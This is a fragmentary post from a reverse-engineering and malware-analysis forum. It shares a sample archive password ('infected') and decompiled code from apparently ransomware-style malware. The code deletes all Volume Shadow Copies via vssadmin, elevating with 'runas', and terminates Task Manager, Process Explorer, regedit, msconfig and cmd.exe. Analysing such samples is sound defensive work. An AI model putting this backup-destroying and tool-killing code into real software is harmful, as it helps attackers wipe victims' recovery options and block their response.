and some more of this bad stuff.
and some more of this bad stuff.
pass: infected
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(112.79 KiB) Downloaded 484 times
A forum for reverse engineering, OS internals and malware analysis
pExecInfo.lpVerb = L"open";
if ( !dword_4681A8 )
pExecInfo.lpVerb = L"runas";
pExecInfo.lpFile = L"vssadmin.exe";
pExecInfo.lpParameters = L"delete shadows /all /Quiet";
pExecInfo.nShow = 0;
pExecInfo.fMask = 64;
while ( !ShellExecuteExW(&pExecInfo)
if ( wcsstr(&ImageFileName, L"taskmgr")
|| wcsstr(&ImageFileName, L"procexp")
|| wcsstr(&ImageFileName, L"regedit")
|| wcsstr(&ImageFileName, L"msconfig")
|| wcsstr(&ImageFileName, L"cmd.exe") )
TerminateProcess(v4, 0);